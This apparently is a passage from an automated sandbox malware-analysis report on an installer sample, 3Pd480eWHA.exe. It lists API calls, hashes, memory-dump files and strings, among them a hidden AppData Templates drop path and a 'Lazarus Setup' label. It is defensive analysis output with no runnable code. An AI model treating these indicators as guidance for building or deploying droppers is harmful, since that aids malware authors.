                                                                                              • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403CF0), ref: 00403F1D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: 0fd0461592f2d81c1c03ce05c628ae056ab63dad8406c1f23e4af249cfc5fe4d
                                                                                              • Instruction ID: 7c635d8461ea366e4ce50998120561f43c0f0a4d26a99d582f7a8baadb7aa675
                                                                                              • Opcode Fuzzy Hash: 0fd0461592f2d81c1c03ce05c628ae056ab63dad8406c1f23e4af249cfc5fe4d
                                                                                              • Instruction Fuzzy Hash: 98A00176808101EBCB029B50FE08D4ABF62ABA4709B12D426E25594174D6365871FF2A
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 6ef222803d68d34d2b98f7333693f5778702576746e8508d9016a81179eb72e8
                                                                                              • Instruction ID: 792a8355e77204e71b52dac9cb8dd8af6eaf68ea71b947aa0f734c6da66c5308
                                                                                              • Opcode Fuzzy Hash: 6ef222803d68d34d2b98f7333693f5778702576746e8508d9016a81179eb72e8
                                                                                              • Instruction Fuzzy Hash: 9AD0C777B145404BD750E7B87E8545A6399F7513253204D33D502F1091D678C9059A29
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004048BA
                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004048C5
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000001), ref: 0040490F
                                                                                              • LoadBitmapA.USER32(0000006E), ref: 00404922
                                                                                              • SetWindowLongA.USER32(?,000000FC,00404E99), ref: 0040493B
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040494F
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404961
                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404977
                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404983
                                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404995
                                                                                              • DeleteObject.GDI32(00000000), ref: 00404998
                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049C3
                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049CF
                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A64
                                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A8F
                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AA3
                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404AD2
                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404AE0
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404AF1
                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BEE
                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C53
                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C68
                                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C8C
                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CAC
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404CC1
                                                                                              • GlobalFree.KERNEL32(?), ref: 00404CD1
                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D4A
                                                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 00404DF3
                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E02
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E22
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404E70
                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404E7B
                                                                                              • ShowWindow.USER32(00000000), ref: 00404E82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $M$N
                                                                                              • API String ID: 1638840714-813528018
                                                                                              • Opcode ID: 4be3ebb239eb5df190ca789ef438fd3f359f8d4e72245769c592d36fe31c7233
                                                                                              • Instruction ID: 76d2e208bb82396193868b8099a6daa05122b73eb358a4a137ee08f8801950ae
                                                                                              • Opcode Fuzzy Hash: 4be3ebb239eb5df190ca789ef438fd3f359f8d4e72245769c592d36fe31c7233
                                                                                              • Instruction Fuzzy Hash: F1026CB0900209AFEB14DF94DD85AAE7BB9FB84314F10813AF610BA2E1D7789D51CF58
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040437E
                                                                                              • SetWindowTextA.USER32(00000000,?), ref: 004043A8
                                                                                              • SHBrowseForFolderA.SHELL32(?,0079D918,?), ref: 00404459
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404464
                                                                                              • lstrcmpiA.KERNEL32(Call,0079E540), ref: 00404496
                                                                                              • lstrcatA.KERNEL32(?,Call), ref: 004044A2
                                                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044B4
                                                                                                • Part of subcall function 004054E6: GetDlgItemTextA.USER32(?,?,00000400,004044EB), ref: 004054F9
                                                                                                • Part of subcall function 00405F77: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\3Pd480eWHA.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032DC), ref: 00405FCF
                                                                                                • Part of subcall function 00405F77: CharNextA.USER32(?,?,?,00000000), ref: 00405FDC
                                                                                                • Part of subcall function 00405F77: CharNextA.USER32(?,"C:\Users\user\Desktop\3Pd480eWHA.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032DC), ref: 00405FE1
                                                                                                • Part of subcall function 00405F77: CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032DC), ref: 00405FF1
                                                                                              • GetDiskFreeSpaceA.KERNEL32(0079D510,?,?,0000040F,?,0079D510,0079D510,?,00000001,0079D510,?,?,000003FB,?), ref: 00404572
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040458D
                                                                                                • Part of subcall function 004046E6: lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404601,000000DF,00000000,00000400,?), ref: 00404784
                                                                                                • Part of subcall function 004046E6: wsprintfA.USER32 ref: 0040478C
                                                                                                • Part of subcall function 004046E6: SetDlgItemTextA.USER32(?,0079E540), ref: 0040479F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: @y$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne$Call
                                                                                              • API String ID: 2624150263-2540035258
                                                                                              • Opcode ID: dc4fe7cf9e1a75852f8a478e9657d204a566c4560be991004467591f2bc4fc9b
                                                                                              • Instruction ID: dc70ebfb722856edf20ca9fe518129045a13840cef36c67e0ec65d3b8ea71268
                                                                                              • Opcode Fuzzy Hash: dc4fe7cf9e1a75852f8a478e9657d204a566c4560be991004467591f2bc4fc9b
                                                                                              • Instruction Fuzzy Hash: 69A182B1900208ABDB11EFA5DC45BAF77B8EF85314F10843BF601B62D1D77C9A418B69
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\synkefrit, xrefs: 0040211D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\synkefrit
                                                                                              • API String ID: 123533781-2623163684
                                                                                              • Opcode ID: 9070b07f5c49c3eba4a055dbb4da1717ebb68c024122170813a0f181913405a8
                                                                                              • Instruction ID: 14d4926e91d078e82bebccc5f6ab74bc99395aff19d04a9878b07c190defc42e
                                                                                              • Opcode Fuzzy Hash: 9070b07f5c49c3eba4a055dbb4da1717ebb68c024122170813a0f181913405a8
                                                                                              • Instruction Fuzzy Hash: 9D513871A00208BFDB10DFA4C988A9DBBB5FF48318F20856AF515EB2D1DB799941CB54
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID:
                                                                                              • API String ID: 1974802433-0
                                                                                              • Opcode ID: d3616940253a6c47e3692c4c08840169220b4dbfcc92f4ed15c26e48d9ac8dbb
                                                                                              • Instruction ID: 693c9160ce4d260d62fecbf2f45a0834f3a8ccba4a644e55fc62545b2e120305
                                                                                              • Opcode Fuzzy Hash: d3616940253a6c47e3692c4c08840169220b4dbfcc92f4ed15c26e48d9ac8dbb
                                                                                              • Instruction Fuzzy Hash: F9F0A0335081509FE701E7B49949AEEB778EF61324F60457BF241B21C1D7B84A84AA3A
                                                                                              APIs
                                                                                              • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040C5
                                                                                              • GetDlgItem.USER32(00000000,000003E8), ref: 004040D9
                                                                                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004040F7
                                                                                              • GetSysColor.USER32(?), ref: 00404108
                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404117
                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404126
                                                                                              • lstrlenA.KERNEL32(?), ref: 00404129
                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404138
                                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040414D
                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004041AF
                                                                                              • SendMessageA.USER32(00000000), ref: 004041B2
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004041DD
                                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040421D
                                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 0040422C
                                                                                              • SetCursor.USER32(00000000), ref: 00404235
                                                                                              • ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,00000001), ref: 00404248
                                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 00404255
                                                                                              • SetCursor.USER32(00000000), ref: 00404258
                                                                                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404284
                                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404298
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                              • String ID: Call$N$open
                                                                                              • API String ID: 3615053054-2563687911
                                                                                              • Opcode ID: ffa70ba6b414771cfedee8d2664e4b0672246e5e1ae3d005f3366e5b10bf2318
                                                                                              • Instruction ID: 325d301b2710361d9817967eb08788495a0e15e312a989604f50e6602a626d4c
                                                                                              • Opcode Fuzzy Hash: ffa70ba6b414771cfedee8d2664e4b0672246e5e1ae3d005f3366e5b10bf2318
                                                                                              • Instruction Fuzzy Hash: 9161C671A40209BFEB109F60DC45F6A7B69FB84744F10816AFB05BA2D1C7BCA951CF98
                                                                                              APIs
                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                              • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                              • DrawTextA.USER32(00000000,Lazarus Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F$Lazarus Setup
                                                                                              • API String ID: 941294808-2672100267
                                                                                              • Opcode ID: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                                                              • Instruction ID: 5377a76c68583d826c01589a66ce84b6d9bb3dc06a218cd9f98f6b2c798b1645
                                                                                              • Opcode Fuzzy Hash: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                                                              • Instruction Fuzzy Hash: 74419C71804249AFCB058FA5CD459BFBFB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                                                              APIs
                                                                                              • lstrcpyA.KERNEL32(007A02D0,NUL,?,00000000,?,00000000,00405BE8,?,?), ref: 00405A64
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405BE8,?,?), ref: 00405A88
                                                                                              • GetShortPathNameA.KERNEL32(?,007A02D0,00000400), ref: 00405A91
                                                                                                • Part of subcall function 004058E4: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058F4
                                                                                                • Part of subcall function 004058E4: lstrlenA.KERNEL32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405926
                                                                                              • GetShortPathNameA.KERNEL32(007A06D0,007A06D0,00000400), ref: 00405AAE
                                                                                              • wsprintfA.USER32 ref: 00405ACC
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,007A06D0,C0000000,00000004,007A06D0,?,?,?,?,?), ref: 00405B07
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B16
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B4E
                                                                                              • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0079FED0,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BA4
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405BB5
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BBC
                                                                                                • Part of subcall function 0040597F: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\3Pd480eWHA.exe,80000000,00000003), ref: 00405983
                                                                                                • Part of subcall function 0040597F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
